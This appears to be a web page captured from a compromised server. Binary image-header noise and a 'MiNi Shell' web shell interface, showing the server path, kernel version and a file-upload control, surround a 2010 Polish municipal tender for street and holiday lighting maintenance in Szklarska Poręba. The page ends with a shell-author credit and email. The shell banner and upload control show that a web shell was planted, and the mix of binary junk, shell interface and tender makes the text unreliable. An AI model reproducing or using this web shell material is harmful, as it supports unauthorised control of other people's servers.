JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100215/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100215/31473-N-2010.html

<p class="kh_header"><b>Szklarska Poręba: Konserwacja i utrzymanie oświetlenia ulicznego na terenia miasta Szklarska Poręba</b><br>
<b>Numer ogłoszenia: 31473 - 2010; data zamieszczenia: 15.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Szklarska Poręba , ul. M. Buczka 2, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 075 7547712, faks 075 7547724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szklarskaporeba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja i utrzymanie oświetlenia ulicznego na terenia miasta Szklarska Poręba.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.  ZAKRES RZECZOWY PRAC ZWIĄZANYCH Z KONSERWACJĄ I UTRZYMANIEM OŚWIETLENIA  ULICZNEGO   obejmuje:
 -  1 097 sztuk energooszczędnych punktów świetlnych , z których :
   88 sztuk [ słupy i oprawy ]  -  na ul. Turystycznej i ul. 11.Listopada objętych jest okresem gwarancji jakości , w tym 21 sztuk na ul. Turystycznej - gwarancją jakości udzieloną przez EnergięPro Jelenia Góra  i 67 sztuk na ul.11.Listopada-   gwarancją jakości udzieloną przez SKANSKA S.A. Warszawa 
   12 sztuk [ słupy ] -  na ul. Demokratów  objętych jest okresem gwarancji jakości udzieloną przez EnergięPro Jelenia Góra
 - 30 sztuk punktów zapalania ( sterowania).

1. Uszczegółowienie  zakresu prac :

- usuwanie awarii obwodu oświetlenia ulicznego w ciągu dwóch (2) dni roboczych od daty wystąpienia awarii oraz  przedłożenie Zamawiającemu raportu z wykonania usterki  w ciągu jednego (1) dnia roboczego od usunięcia,

-  naprawa nieczynnego punktu świetlnego  w ciągu trzech (3) dni roboczych od daty wystąpienia awarii oraz  przedłożenie Zamawiającemu raportu z wykonania usterki  w ciągu jednego (1) dnia roboczego od usunięcia,

- usuwanie zagrożeń  związanych z bezpieczeństwem ruchu drogowego i osób trzecich                 (np. uszkodzona latarnia, itp.)  w trybie natychmiastowym ,

- naprawa uszkodzonych styków, połączeń, przewodów w oprawach i słupach, wnęk bezpiecznikowych, końcówek kabli, itp.

- wymiana uszkodzonych bezpieczników, styczników, żarówek itp. urządzeń oświetlenia ulicznego i parkowego,

- dbanie o estetyczny wygląd urządzeń w trakcie trwania umowy, tj.:
      1- czyste klosze i korpusy      -  mycie kloszy minimum jeden (1) raz w roku,
      2- pozamykane wnęki słupowe i szafy oświetleniowe,
      3- wypionowane, czyste słupy,
      4- brak ubytków na elementach betonowych i żelbetowych,
      5- metalowe części urządzeń bez śladu korozji,

- konserwacja szafek kablowych, oświetleniowych , tablic oświetleniowych w stacjach,

- lokalizacja  oraz awaryjna naprawa uszkodzonych odcinków kabli sterujących i oświetleniowych,

- malowanie słupów oświetleniowych farbą olejną ( maksymalnie do 20 sztuk) ,

- sprawdzanie ubytków zapłonowych opraw,

- ustalanie przyczyn awarii na oświetleniu objętym gwarancją oraz kontrola realizacji usterek gwarancyjnych,

- sprawdzanie stanu ochrony przeciwporażeniowej i przeciwpożarowej,

- sprawdzanie poziomu hałasu i drgań źródeł światła,

- sprawdzanie wskazań aparatury kontrolno-pomiarowej,

- utrzymanie właściwego stanu opraw oświetleniowych i ich elementów w stopniu  nie powodującym   powstanie olśnienia i zmniejszenia żywotności źródeł światła,

- utrzymanie właściwego stanu opraw oświetleniowych w stopniu nie powodującym nadmiernego zmniejszenia  strumienia świetlnego,

-  montaż na słupach,  w miejscach wskazanych przez Zamawiającego, do dwudziestu (20) sztuk opraw oświetleniowych wraz z wysięgnikami ,  stanowiącymi  materiał Zamawiającego,  

- utrzymanie właściwego stanu urządzeń oświetleniowych gwarantujących prawidłową pracę tych urządzeń bez zagrożenia osób postronnych, obsługi i otoczenia,

- ustawianie i regulacja przekaźników zmierzchowych { czas pomiędzy załączeniem pierwszego
   a ostatniego obwodu nie może być dłuższy niż piętnaście (15)  minut },

- wykonanie przeglądu stanu istniejącego oświetlenia minimum raz (1) w tygodniu ,

- przedłożenie raportu z wykonanych czynności konserwacyjnych raz (1) w miesiącu- na podstawie
   księgi przyjętych zgłoszeń i ich napraw, dzienników przeglądów, protokołów z przeprowadzonych 
   badań i pomiarów

- utylizacja zdemontowanych urządzeń oświetlenia oraz  źródeł światła zgodnie z obowiązującymi 
   przepisami w zależności od klasyfikacji odpadów,

- wykonywanie przycinki _ prześwietleń drzew  i krzewów w rejonie punktów oświetleniowych trzy (3) razy w roku oraz na wniosek zlecającego,

-  prowadzenie,  na bieżąco, niezbędnej dokumentacji z przeprowadzonych zabiegów eksploatacyjnych takich jak:  dzienniki przeglądów,  protokoły z przeprowadzonych badań i pomiarów,

- prowadzenie, na bieżąco, wymaganej przepisami dokumentacji eksploatacyjnej  oświetlenia ulicznego i przekazanie jej Zamawiającemu na koniec trwania Umowy,

- prowadzenie  całodobowego przyjmowania zgłoszeń o usterkach oświetlenia ulicznego pod numerem telefonu: tel. stacjonarny_  tel. komórkowy_
(  do uzupełnienia po wyborze Oferty), 

-  prowadzenie, na bieżąco, księgi przyjętych zgłoszeń o usterkach  oświetlenia i ich naprawie,

- wykonanie pozostałych , innych nie opisanych  robót towarzyszących występujących podczas konserwacji i utrzymaniu oświetlenia ulicznego.

II. ZAKRES RZECZOWY PRAC ZWIĄZANYCH Z KONSERWACJĄ I UTRZYMANIE OŚWIETLENIA ŚWIĄTECZNEGO obejmujący 
  do 200 sztuk elementów  iluminacji świetlnych 

1. Uszczegółowienie  zakresu prac :

-  pobranie, z siedziby Zamawiającego, elementów oświetlenia świątecznego ,

-  przegląd elementów oświetlenia świątecznego,

-  wymiana niesprawnych lub uszkodzonych elementów oświetlenia świątecznego,

- zainstalowanie elementów oświetlenia świątecznego - w miejscach i terminach wskazanych przez Zamawiającego,

-  bieżące utrzymywanie elementów oświetlenia świątecznego w stanie sprawności,

-  demontaż, w terminie wskazanym przez Zamawiającego , elementów oświetlenia świątecznego,

-  konserwacja oraz złożenie elementów oświetlenia świątecznego w siedzibie Zamawiającego oraz zabezpieczenie ich przed ewentualnym uszkodzeniem lub zniszczeniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego w kwocie nie przekraczającej 50 % wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówień  - w przypadku dobudowy nowych punktów świetlnych . 

Zamówienie uzupełniające może być udzielone w okresie 3 lat od udzielenia zamówienia podstawowego i wykonawcy , któremu zostało ono udzielone.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.23.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie wiedzy i doświadczenia  popartych  należytym wykonaniem w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  trzech (3)  konserwacji oświetlenia ulicznego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie odpowiednim potencjałem technicznym w tym szczególnie: pojazdem z podnośnikiem.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie  osobami zdolnymi do wykonania zamówienia, w tym szczególnie:  osobami posiadającymi zaświadczenie kwalifikacyjne do pracy pod napięciem n/n  oraz świadectwo kwalifikacyjne E- gr.1 i co najmniej jedną osobą posiadającą świadectwo kwalifikacyjne D - gr.1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie  środków finansowych  lub zdolności kredytowej w wysokości 50 000 zł oraz opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia w wysokości co najmniej  100 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  przewiduje możliwość zmiany umowy w przypadku :

a)   rezygnacji z wykonania pełnego zakresu prac objętych zamówieniem w sytuacji wyłączenia z uzytkowania ulicy/drogi na czas jej remontu, przekazanie innemu podmiotowi nieodpłatne wykonanie i obsługę iluminacji światecznych,

b)   wystąpienia siły wyższej  przez pojęcie,  której należy rozumieć zdarzenie bądź połączenie zdarzeń
      obiektywnie niezależnych od Zamawiającego, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Zamawiający nie mógł przewidzieć i którym nie mógł zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla stosunków zobowiązaniowych; na okres działania siły wyższej obowiązki Strony Umowy ulegają zawieszeniu w zakresie uniemożliwionym przez działanie siły wyższej;

d)  zmiany terminu realizacji zamówienia, o czas niezbędny do zachowania procedur wynikających  z ustawy p.z.p. lub  w przypadku wystąpienia okoliczności ,których Zamawiający pomimo dołożenia należytej staranności  nie  przewidział,

e)   wystąpienia zmiany stosunków, której nie można było przewidzieć wykonanie usługi  groziłoby wykonawcy lub Zamawiającemu rażącą stratą (dotyczy to m.innymi  możliwości zmiany wynagrodzenia ryczałtowego).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szklarskaporeba.pl zakladka: zamowienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ze strony internetowej Miasta lub w wersji papierowej -odplatnie ( 15 zł) , na uprzednio złożony wniosek do Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2010 godzina 10:00, miejsce: za pośrednictwem np. operatora publicznego _Urząd Miasta Szklarska Poręba, ul. M. Buczka Nr 2,  58-580 Szklarska Poręba  lub osobiście  do -  Biura Obsługi Interesanta- parter, adres j.w..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com